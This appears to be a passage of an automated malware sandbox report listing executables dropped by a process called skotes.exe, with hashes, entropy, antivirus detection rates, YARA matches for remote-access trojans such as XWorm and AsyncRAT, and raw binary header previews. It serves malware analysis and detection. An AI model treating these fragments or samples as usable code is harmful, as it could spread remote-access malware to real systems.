                                                                                                                                                                                                                                                SSDEEP:24576:/EMmu7v69wBqAqcm5yf7k+GB3YYHd0UMmw0HikcW1NxVPtb/NJqQyBBSGUGASYk3:/EM97vYwBqAqcayf7k+GZYYHd0UMmw0U
                                                                                                                                                                                                                                                MD5:A732362B415CD62F07D30DB89E742C85
                                                                                                                                                                                                                                                SHA1:B0D090B702BF006BA020488298180E107810164A
                                                                                                                                                                                                                                                SHA-256:E0BA6D52473E2FAAEE92F61E2F187829FE312539F4ADF8CF1CC7E955FCDFD400
                                                                                                                                                                                                                                                SHA-512:570F89D29B3D2F266E6F28D227F88ADEDEFBC2D45420C14FCBE10166D07E5F7B88EF740388DE9480BBD3CD4A1E2DF3CCEB2B300ACBDC12CBB60C38F884D1E19D
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s."X..qX..qX..qQj0qR..qI..pZ..qI..p[..qI..pQ..qI..pN..qX..q...qX..qT..q..pY..qRichX..q........................PE..d.....dg.........."....*.......................@....................................'.....`.................................................<...................................$....z..T....................{..(...py..@............................................text............................... ..`.rdata..R...........................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4438776
                                                                                                                                                                                                                                                Entropy (8bit):7.99505709582503
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:98304:Z/5zwjjEgd1H9RKNXpyUEJh56Nd1QVECgnD8EUVLbZJZCH3J53uJ+b:Z/qBdHRSXYBmrohgnDfUxbZJE2K
                                                                                                                                                                                                                                                MD5:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                                SHA1:7B50E108E293E54C15DCE816552356F424EEA97A
                                                                                                                                                                                                                                                SHA-256:BA9212D2D5CD6DF5EB7933FB37C1B72A648974C1730BF5C32439987558F8E8B1
                                                                                                                                                                                                                                                SHA-512:A7538C6B7E17C35F053721308B8D6DC53A90E79930FF4ED5CFFECAA97F4D0FBC5F9E8B59F1383D8F0699C8D4F1331F226AF71D40325022D10B885606A72FE668
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                                                                                Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L....?.O............................_.............@..................................D..............................................0...O...........{C..?..............................................................l............................text............................... ..`.rdata...;.......<..................@..@.data....M..........................@....rsrc....O...0...P..................@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P.P...P....Y.nj'.@....u..v..=..A..6P......P....9^..].v8.^..3......h..A.P..........P......P..x.A..E..E....;F.r......P.~...Y..6..j...t.A...t$..D....V...%s......A..F8......^.j..q.....A..3.9.`.A.t...@....9D$.t..t$.Ph.....5X.A.....A.3.....D$..`...|$..u..@.....3.....p.A.............t$..D$..t$...`.A./.@..t$...P.Q..%`.A...3.....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u...t$...T.A..L$.......%..........S.\$.V..C;^.tLW3.j.Z...........Q.....3.9F.Y~.9F
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):90112
                                                                                                                                                                                                                                                Entropy (8bit):5.956916783358023
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:tovw+k9MVwKKtX8nL1hskkwOmCBbuyypy3qDT+YsR6JqgBSO88RQTCbPIc:2nFwKKKnYkdfkbuy76DTGo8Ov6ebN
                                                                                                                                                                                                                                                MD5:07E410214A2AEB8F577E407154252F3C
                                                                                                                                                                                                                                                SHA1:697FAC558B66C0476C3F04D80764FA75EB6DE77D
                                                                                                                                                                                                                                                SHA-256:12E340E551ABBF8A61A6DD73D45C94E88AA217CEAE070BA0748360D24C706114
                                                                                                                                                                                                                                                SHA-512:470B208122D6177E4635038418E4966A63725C7F9B21B4D41F3C89B953BAE9A23E141424B358110DE3A8D1624C125224A7471BB44EF7039C313D03E844A20ECC
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\1018897001\vQeyqr1.exe, Author: ditekSHen
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....eg.................V..........nt... ........@.. ....................................@..................................t..O.................................................................................... ............... ..H............text...tT... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B................Pt......H.......4t..........&.....................................................(....*.r...p*. ,-..*..(....*.r!..p*. ~.H.*.s.........s.........s.........s.........*.r...p*. X...*.r...p*. `..*.r...p*. ....*.r...p*. ...*.r[..p*..((...*.r...p*. P4..*.r@..p*. ..e.*.(,...-.(-...,.+.(....,.+.(+...,.+.(*...,..(d...*"(....+.*"(....+.*&(F...&+.*.+5sq... .... .'..or...(,...~....-.(e...(W...~....os...&.-.*.r...p*. r.d.*.r...p*.rH..p*. y/..*.r...p*. e...*.r...p*. #,..*.r...p*. &G..*.rX..p*.
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):863093
                                                                                                                                                                                                                                                Entropy (8bit):7.96744840145825
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:qWryjPGki4+5vfHU3fYFy664hRvRKMU+Et:1+FQVUPA/v8MhQ
                                                                                                                                                                                                                                                MD5:8EB4F92605E35C57A42B0917C221D65C
                                                                                                                                                                                                                                                SHA1:0E64D77EF1B917B3AFE512B49710250C71369175
                                                                                                                                                                                                                                                SHA-256:B57D78D93F74F7AE840AB03D3FDA4F22A24AD35AFCF9A53128CF82A92A67A085
                                                                                                                                                                                                                                                SHA-512:4CC5DB426C8DE3D7AFDCFA26440D5BD9A885F5148E4307B8D04C5D56C96672D5C82ED9989BF346CE7AECEA07D980735C46A930B885F824BA53738AC76DBB05BF
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................p............@.................................@............R...............$...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc....R.......T..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4451328
                                                                                                                                                                                                                                                Entropy (8bit):7.989186024729904
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:98304:wULHW/9XyrNfL1FG3J+hSCodi5cKv7o/D+mzfETgkfAzmf/uW9:DL2/Vy1L8+4Co9/dzETSzSD
                                                                                                                                                                                                                                                MD5:0121D24D5F6392439A1D49C2904595E1
                                                                                                                                                                                                                                                SHA1:E01FA6B2601FCA3CD127B7D9048319C088E6B6EE
                                                                                                                                                                                                                                                SHA-256:A47EDDF45C659395E694138FF56FC4F01FC9E66DF4E0150B14DA37C1A9AB4DE6
                                                                                                                                                                                                                                                SHA-512:852C11CDE17D6D4DE9D0395C3CA77512DF6AAF09C85A1AC984731FCAA5BB25BE2E71C494010721356971BC62E3798D10FB3BB3ED3A62C2EE65FE6B887BB45220
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...`.......pH...@...................................C...@... ............................._pt.s....`t..................... A...............................@...................................................... . .Pt......L(.................@....rsrc........`t......\(.............@....idata .....pt......^(.............@... .`8...t......`(.............@...hkbprtow.p......d...b(.............@...nzqpevfi.....P........C.............@....taggant.0...`..."....C.............@...........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1863680
                                                                                                                                                                                                                                                Entropy (8bit):7.947727721324286
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:b0iMcVeC2k+eFGF2uX6zTTIudd8Cshc5:oi5zTop63rLW
                                                                                                                                                                                                                                                MD5:27C1F96D7E1B72B6817B6EFEFF037F90
                                                                                                                                                                                                                                                SHA1:2972CC112FC7E20CBF5952ABE07407B8C1FBB2A2
                                                                                                                                                                                                                                                SHA-256:AEC3EC473DE321D123E939985579227EE62B53B3B3EDB7AB96E2A66C17E9696D
                                                                                                                                                                                                                                                SHA-512:9A31DC9945889D35AEA8710DF2F42806C72C422B7B5F4AA8ACBA6986CBD9EA6A49181A41A50EE21CCBED86CBFF87C98A742E681AC3F6A87E2BD4436C9112EB32
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................pI...........@...........................I.....2.....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... .0*..@.......\..............@...lzigcvvj.....p/......^..............@...pdsqmwos.....`I......J..............@....taggant.0...pI.."...N..............@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):776832
                                                                                                                                                                                                                                                Entropy (8bit):7.859727158445845
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
                                                                                                                                                                                                                                                MD5:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                                                SHA1:3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
                                                                                                                                                                                                                                                SHA-256:C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
                                                                                                                                                                                                                                                SHA-512:928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):22016
                                                                                                                                                                                                                                                Entropy (8bit):5.338206717136569
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:78HIRrJs1HLBDhq5RWBNBlBThtq2uoyLizwxeNLHdWuNMV275RtAcL8SFS69rvwM:Qqls1HLBDhIRWbXlq2uVk75RuSFSm6EJ
                                                                                                                                                                                                                                                MD5:04F57C6FB2B2CD8DCC4B38E4A93D4366
                                                                                                                                                                                                                                                SHA1:61770495AA18D480F70B654D1F57998E5BD8C885
                                                                                                                                                                                                                                                SHA-256:51E4D0CBC184B8ABFA6D84E219317CF81BD542286A7CC602C87EB703A39627C2
                                                                                                                                                                                                                                                SHA-512:53F95E98A5ECA472ED6B1DFD6FECD1E28EA66967A1B3AA109FE911DBB935F1ABF327438D4B2FE72CF7A0201281E9F56F4548F965B96E3916B9142257627E6CCD
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 57%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.7..........."...0..L...........j... ........@.. ....................................`.................................<j..O....................................i..8............................................ ............... ..H............text....J... ...L.................. ..`.rsrc................N..............@..@.reloc...............T..............@..B................pj......H.......(7...2...........................................................0..8.......s/.....(....} .....}!.....}.....| .....(...+.| ...(....*.0..P........~.........,B.r...p(.....r...p(.....(.....r...p.(....(......(....o......(......*.0..8.......s2.....(....}(.....}).....}'....|(.....(...+.|(...(....*.0..H........s......./......+....~.....~.....io.........X.......-.r...p.(......+...*.0............r...p( ...o!....+..*...0............r...p( ...o!....+..*...0..2.........r...pr...p
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4425728
                                                                                                                                                                                                                                                Entropy (8bit):7.986049234740422
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:98304:IsU3t5SLbByTqc4sEew5/7eXoqRXrIFRgAneqXmYGsCZ+UWz463/:IZ3abwTZ4cuD5cXUFbneJsLUWLP
                                                                                                                                                                                                                                                MD5:6087D5A01774D89431F633D9B2D1D705
                                                                                                                                                                                                                                                SHA1:5C3B075E194FA131FDFFDAB37FFB4936DB50A0D7
                                                                                                                                                                                                                                                SHA-256:51121D1B988327E1845BE7351022F85370A19154989ED3079CF7C202F45A428F
                                                                                                                                                                                                                                                SHA-512:4ACC1431638AD5B1B66137EC1A253EF2EEC1655F111FD7EDD22692D7E5EDADEF61DD40ED69180D13B7627822DA827E3CDECE77D7F868F72E6E0FA28A38B34A91
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.JI..Lu..2...........`I...@.................................-yD...@... ............................._.r.s.....r.....................................................0....................................................... . ..r......4(.................@....rsrc.........r......D(.............@....idata ......r......F(.............@... ..7...r......H(.............@...lvbdatvl. ...........J(.............@...bclfnnmn.............bC.............@....taggant.0......."...fC.............@...........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1916416
                                                                                                                                                                                                                                                Entropy (8bit):7.940600827234037
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:S9WKusfT3Tdacs2qoFtgPRkXjjiy99LZIQtgad1Aoi6:RsrT/coF8gvl9996afA7
                                                                                                                                                                                                                                                MD5:FCC660D15800AE9E2EE9EF335805414F
                                                                                                                                                                                                                                                SHA1:4FB9EB7BCCFD8FD42E38EC43A94A524A85B5E169
                                                                                                                                                                                                                                                SHA-256:02C9A35216A7AEA10E017D37F1B0C30F59AD6E3D9E379091402946BEC0A34FDF
                                                                                                                                                                                                                                                SHA-512:3458054376F0B9AE0C7540FE7C4ED125246D9F17D0966B80BFCC435557BD450C591E9E223511E96E61A8B2F77FBC41FDF154DE86F23614A96C40F0A78A2A533E
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................@....................@..................................1......................................[.A.o.....@.....................................................P....................................................... . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... ..(...A.....................@...gptxkuce.P...0j..F..................@...tnohnhsw............................@....taggant.0......."..................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3011072
                                                                                                                                                                                                                                                Entropy (8bit):7.988793876212763
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:Avyf4qVNEpOOKtCXtdL7lBpop8W3/AJADEkHrgs7R0fln65OIJc6dk1o9/UybZ5:Avi4gNEpOOKtuj7lBp48UAw0N4Jc0Uef
                                                                                                                                                                                                                                                MD5:CEE335F824BAB75BBC98D04DEF73E013
                                                                                                                                                                                                                                                SHA1:B6CABEA09CB1D37E1919AAF6813D11904E951114
                                                                                                                                                                                                                                                SHA-256:B8D24EEB78CF1B5A25F35E724A6ED3A444DAE5AA1F47DF344FF224A9D5D9EEFA
                                                                                                                                                                                                                                                SHA-512:9568270173DD0C10F015584226514C112449988A4D2D6BCA60297F47EF7C3EE44D3AC6BC3A287B7AE920C5EE1A2A1285561864882484D719B155EACB65994634
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....*eg..........".......-..L........... ....@...... .......................@............@...........................................................-.pK........................................................................................... ..H............text.....-.. ....-................. ..`.rsrc...pK....-..L....-.............@..@........................................H...........D]......=.........,..........................................0..i........+:~....+6+;.,..,*+6,..-#~....~.....+'+,.-.*~....~....."+!+&*.+.(....+..+..+.(....+.(....+.(....+.(....+......(O...*b.....+.+.*(-...+.(....+.....0...........,.......8..........8..........8.....,t~....8....8....8.....,B,.~....~.....D8....8....+.~....~.... ....8....(.....,A~......(....,.~....~.... ....(....(....*~....~.... ....(....(....*(P...8N...(P...8O...(P...8P....8W....8V...(....8Q...(....8]...(...
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1887232
                                                                                                                                                                                                                                                Entropy (8bit):7.947645167072717
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:O1lWP0x/0lez2uNV2Y5y+M14fFwaYNsPt+aeJTiH:Icka2zuaMmaJ
                                                                                                                                                                                                                                                MD5:02A689D922E4CB98E6FB5D9AE4A026E1
                                                                                                                                                                                                                                                SHA1:6F18B7EBF4F097E697F4EC0B2293475CD0242E8F
                                                                                                                                                                                                                                                SHA-256:7F3742A82536E9BD588785C351A7B18653ECC783C3CD2DD9B9CA30834B247C34
                                                                                                                                                                                                                                                SHA-512:60A110D5955B510D510EEB556D2CD1556FF50D2B95EF9B10FAD8F824277E64AF8E9A082E88E5CA7ED2F9571815FDAADBC404D99BAB2EB3DFA1847DCCF40CDCD1
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................PJ...........@...........................J...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...gghkcrho.P..../..H...^..............@...phbqiwyh.....@J.....................@....taggant.0...PJ.."..................@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2850816
                                                                                                                                                                                                                                                Entropy (8bit):6.502732547592341
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:Zr0XExBbCGSc7EH3/hcDz7rZ36N+KFGJf4:50XExRfp7EH3/hqVKFF
                                                                                                                                                                                                                                                MD5:101F06101CEB14FAE553D98292FAA442
                                                                                                                                                                                                                                                SHA1:DFADEF7FA9BB9EC8B82F65F63BED085798FECAD3
                                                                                                                                                                                                                                                SHA-256:9ACC4A0EA469E6A6F1C944263024167BE02390916D49670C358604E0B17B0CB6
                                                                                                                                                                                                                                                SHA-512:A3B905AE3132234E027DFD416A1714778E757A82A7AE8ADDC7A0D334781E57ADEB5044F7537F2B51452E4AB6D7FC82C410178F5A552BC2E4D3DD776433A9C9CF
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........N...........@...........................N.....*.+...@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@...ahfdhchk..)...$...)..|..............@...qmoqclyl......N......X+.............@....taggant.0....N.."...^+.............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):968192
                                                                                                                                                                                                                                                Entropy (8bit):6.697617556163685
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:bqDEvCTbMWu7rQYlBQcBiT6rprG8aTZp:bTvC/MTQYxsWR7aTZ
                                                                                                                                                                                                                                                MD5:4320DABD6EDEA2B2479E65B07B5346E4
                                                                                                                                                                                                                                                SHA1:E441916A5FD5448F286EE7A5178F808146A9DD6E
                                                                                                                                                                                                                                                SHA-256:9855C936766AE99F2F367DE952823C1648317A18BF129FD566B2E6C6A078D26C
                                                                                                                                                                                                                                                SHA-512:4D74E9C0B18DBE9D5BED3D1746F28D8CCE3BF4BF3D6A73E2291CFD97DFE2B322630345C8B41D7460A48410D7D2036568B0D38CA9B204A8512C337B003C4CEF99
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....eg..........".................w.............@.......................... ......n2....@...@.......@.....................d...|....@..|Z.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...|Z...@...\..................@..@.reloc...u.......v...P..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2772480
                                                                                                                                                                                                                                                Entropy (8bit):6.4841504233005125
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:blungQMjbL+vaYwdHmInng7QrGd14H8bjpWyT:blung53xmInnSrd14HAT
                                                                                                                                                                                                                                                MD5:EA5DCACA8142A4A921DB2D5C042B4490
                                                                                                                                                                                                                                                SHA1:522B4CCC114E2DA5C255EDFEA6239A9784DABF47
                                                                                                                                                                                                                                                SHA-256:FD43D2DCBE5EB2783E68C361FF50A96FD3BCF518FE4E7DC1A38CBD57B775E7E0
                                                                                                                                                                                                                                                SHA-512:59155CD42E5A56BDE0F484E207928F37999BB3072F3D107E9BA40C52A5D47874078F8821125035F0483294C643EF843D7932529F62D24F1CC0088D0E57ECEEAA
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............*.. ...`....@.. ........................*......6+...`.................................U...i....`..D........................................................................................................... . .@... ...@... ..............@....rsrc...D....`.......`..............@....idata . ...........f..............@...tniryivd..).......)..h..............@...nnokcvcq. ...`*......(*.............@....taggant.@....*.."...,*.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1114112
                                                                                                                                                                                                                                                Entropy (8bit):7.7336985855739355
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:FAu2uOTJr0/sBIpMvVEDvtNNVpk3BLSx+ptEH76duCiheu2:4ugJAGIpMmZNNEBLSx4EHGxiC
                                                                                                                                                                                                                                                MD5:EF08A45833A7D881C90DED1952F96CB4
                                                                                                                                                                                                                                                SHA1:F04AEEB63A1409BD916558D2C40FAB8A5ED8168B
                                                                                                                                                                                                                                                SHA-256:33C236DC81AF2A47D595731D6FA47269B2874B281152530FDFFDDA9CBEB3B501
                                                                                                                                                                                                                                                SHA-512:74E84F710C90121527F06D453E9286910F2E8B6AC09D2AEB4AB1F0EAD23EA9B410C5D1074D8BC759BC3E766B5BC77D156756C7DF093BA94093107393290CED97
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.cg..............0......2........... ........@.. .......................`............@.....................................W.......H/...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H/.......0..................@..@.reloc.......@......................@..B........................H........<..........K.......`p...........................................Y?.F60...5..8....4zc.:.V........N.0...1.....O*.S..~.......I...pR..iI......Pn}...iJ!BH.+o/S..yj...8T'.}....y.I.kD.....'....$.6....}..w[. )...j..[.-..0....|...p....h\..L....R.T.~......b.K.h....".8.s`)...1... ....[i&.9....a?.F..N..~..._.^...Q.....43.L.....@v...x..IB.4...........|......(........~.Y.L.S..;..x.)w...v...:..2.....y.%{3w.)..^..7......@...7..k.H..p}."..%.p....0.g.3....g..
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\cmd.exe
